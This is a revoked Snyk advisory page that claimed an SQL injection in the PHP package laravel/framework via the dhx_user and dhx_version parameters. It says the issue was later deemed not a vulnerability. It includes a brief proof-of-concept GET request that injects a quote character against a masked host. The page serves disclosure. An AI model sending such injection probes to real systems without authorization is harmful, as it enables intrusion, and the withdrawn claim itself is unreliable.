SQL Injection The advisory has been revoked - it doesn't affect any version of package laravel/framework Open this link in a new tab


Expand this section
NVD
8.8 high

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-PHP-LARAVELFRAMEWORK-174021
  • published 29 Mar 2019
  • disclosed 28 Mar 2019
  • credit Gianluca Bonanno

Amendment

This was deemed not a vulnerability.

Overview

laravel/framework is a PHP framework for web artisans.

Affected versions of this package are vulnerable to SQL Injection in save.php via the dhx_user and dhx_version parameters.

PoC

GET
/save?dhx_user=1516954053138’&dhx_version=1&swt_subdomain=center01
HTTP/1.1
Host:xxxxxx.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
rv:58.0) Gecko/20100101 Firefox/58.0<
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: href=“https://xxxxxxx.net/agenda“>https://xxxxxxx.net/agenda
X-Requested-With: XMLHttpRequest